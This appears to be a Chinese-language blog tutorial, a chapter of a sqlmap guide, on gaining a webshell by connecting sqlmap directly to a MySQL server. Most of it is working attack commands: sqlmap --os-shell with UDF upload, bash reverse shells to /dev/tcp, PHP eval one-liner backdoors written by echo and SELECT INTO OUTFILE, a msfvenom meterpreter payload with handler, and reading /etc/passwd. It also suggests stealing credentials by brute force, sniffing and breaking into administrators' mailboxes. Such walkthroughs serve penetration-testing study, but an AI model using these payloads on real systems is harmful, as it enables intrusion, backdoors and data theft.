• sqlmap从入门到精通-第四章-4-3 使用sqlmap直连MySQL获取webshell


    4.3 使用sqlmap直连MySQL获取webshell

    在一些场景下,需要通过MySQL直接连接来获取权限,如果通过暴力破解,嗅探等方法获取了账户和密码,而服务器没开放Web服务的情况,那么就得直接通过数据库获取一定的权限了

    4.3.1 使用场景

    (1) 获取了MySQL数据库账户和密码

    (2) 可以访问3306端口及数据库

    4.3.2 扫描获取root账户的密码

    通常有下面一些方法来获取root账户的密码

    (1) phpMyAdmin 多线程批量破解工具,可以通过收集phpMyAdmin地址进行暴力破解

    (2) 代码泄露获取数据库账户和密码

    (3) 文件包含读取配置文件中的数据库账户和密码

    (4) 通过网络嗅探获取

    (5) 渗透运维人员的邮箱及个人主机获取

    4.3.3 获取shell

    1. 通过sqlmap连接MySQL获取shell

    (1) 直接连接数据库

    sqlmap.py -d "mysql://root:123456@127.0.0.1:3306/mysql" --os-shell

    需要注意的小细节

    mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' or 'access://DATABASE_FILEPATH'

    https://github.com/PyMySQL/PyMySQL

    pip install PyMySQL

    ======================================================================================================

    SQLAlchemy not available

    pip install SQLAlchemy

    ============================================================================================================

    [CRITICAL] SQLAlchemy connection issue ('ModuleNotFoundError: No module named 'MySQLdb'')

    pip install mysql-connector-python-rf

    pip install wheel

    pip install -i https://pypi.douban.com/simple/ mysql-connector-python-rf

    最终在kali环境下安装如下模块即可连接

    apt-get install python-mysqldb

    https://stackoverflow.com/questions/22252397/importerror-no-module-named-mysqldb

    pip install pymysql 经过测试,安装此模块即可解决问题

    =======================================================================================

    解决本地搭建环境可以直接通过sqlmap的-d参数直接利用mysql获取交互式shell

    参考文档:

    https://xz.aliyun.com/t/7416  此篇先知的文章并未详细说明,按照此文章的方法并未成功,结果是通过下面的文章解决问题

    https://www.cnblogs.com/caya-yuan/p/11898915.html 

    具体操作的命令如下:

    cd /usr/lib/systemd/system

    vim mariadb.service

    将如下默认的mysql用户改成root权限用户

    [Service]

    Type=simple

    #User=mysql

    #Group=mysql

    Group=root

    User=root

    systemctl daemon-reload

    systemctl start mariadb.service

    ps -ef | grep mysql  -- 这个是查看是不是root用户运行的,确认没有问题就可以开始操作下面的命令进行提权生成交互式shell吧

    =======================================================================================

    python sqlmap.py -d "mysql://root:root@106.54.35.126:3306/mysql" --os-shell   这个测试环境是我自己的vps

    效果展示:

    =======================================================================================

    python sqlmap.py -d "mysql://root:root@106.54.35.126:3306/mysql" --os-shell

    (2) 通过选择32位或者64位操作系统webshell,执行

    bash -i >& /dev/tcp/10.12.22.33/8899 0>&1

    (3) 反弹到服务器10.12.22.33 实际的环境中就是自己的独立公网IP地址

    (4) 通过echo命令生成shell

    echo "<?php @eval($_POST['bmfx']);?>" > /var/www/html/data/phpmyadmin/bmfx.php

    如果可以通过phpmyadmin管理数据库,就可以修改host为"%" 并执行权限更新操作,具体如下:

    use mysql;

    update user set host = '%' where user = 'root';

    flush privileges;

    注意:如果数据库中有都个host连接,修改时可能会导致数据库连接出问题

    2. 通过MSF反弹获取shell

    (1) 使用msfvenom生成MSF反弹的PHP脚本木马,默认端口4444

    msfvenom -p php/meterpreter/reverse_tcp LHOST=10.12.22.33 -f raw > bmfx.php

    (2) 在独立IP或者反弹服务器上运行MSF依次执行一下命令

    msfconsole

    use exploit/multi/handler

    set payload php/meterpreter/reverse_tcp

    set LHOST 10.12.22.33  //这个IP地址就是自己的独立服务器IP地址,

    show options

    run 0 或者 exploit

    (3) 上传并执行PHP文件

    将上面生成的bmfx.php文件上传至目标站点,然后访问,如果没有问题的话,那么MSF会显示成功反弹shell

    3. 通过PHPMyAdmin管理解码查询生成webshell

    select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE 'F:/phpstudy/www/bmfx.php'

    4.3.4 实例演示

    1. 直接连接MySQL数据库

    sqlmap.py -d "mysql:/root:123456@xxx.xx.xx.xx:3306/mysql" --os-shell

    如果上述成功了, 会让你选中服务器架构是32位还是64位

    2. 上传UDF文件

    在上述操作选择系统架构之后,sqlmap会自动上传UDF文件到服务器提权位置,记住,不管获取的shell是否成功都会显示os-shell提示符

    3. 执行命令

    cat /etc/passwd

    如果是真的成功获取了shell,那么执行的结果就是我们想要的信息

    4. 获取反弹shell

    虽然通过sqlmap获取了shell,但实际操作的话着实不方便,需要使用独立的服务器进行反弹shell

    nc -lvnp 9988

    在sqlmap的shell执行

    bash -i >& /dev/tcp/10.12.22.33:9988 0>&1

    5. 在服务器上生成webshell

    上述操作如果没有任何问题,那么就可以找到真实路径直接生成webshell,可以在获取的反弹shell中执行locate *.php找到网站的真实路径,然后在该路径下通过echo命令生成webshell,具体如下:

    echo "<?php @eval($_POST['bmfx]);?>" > bmfx.php

    6. 获取webshell

    上面在服务器上生成的webshell是一句话,可以通过中国菜刀连接此一句话,进行获取webshell

    7. 通过phpMyAdmin生成一句话后门

    select '<?php @eval($_POST[bmfx]);?>' INTO OUTFILE '/var/www/phpmyadmin/bmfx.php'

    8. 通过MSF反弹获取shell

    9. MSF提权参考

    通过MSF反弹shell,执行background将Session放在后台运行,然后搜索可以利用的exploit来进行测试,具体命令如下:

    background

    search "关键字"  //这里是跟漏洞相关的关键字,比如search tomcat 等等

    use exploit/linux

    show options

    set session 1

    exploit

    sessions -i 1

    getuid

    实战测试,可用参考这边文章:https://xz.aliyun.com/t/7416


     
  • 相关阅读:
    secureCRT 实现windows和linux文件互传
    Mybatis Generator最完整配置详解
    部署Maven项目到tomcat报错:java.lang.ClassNotFoundException: org.springframework.web.context.ContextLoaderListener
    阿里云服务器实战: Linux MySql5.6数据库乱码问题
    如何将 Java 项目转换成 Maven 项目
    Windows7下Maven环境搭建及其使用
    Java HashMap工作原理及实现
    关于tomcat部署应用的三种方式
    关于浏览器缓存
    MySql使用存储过程实现事务的提交或者回滚
  • 原文地址:https://www.cnblogs.com/autopwn/p/13200063.html
Copyright © 2020-2023  润新知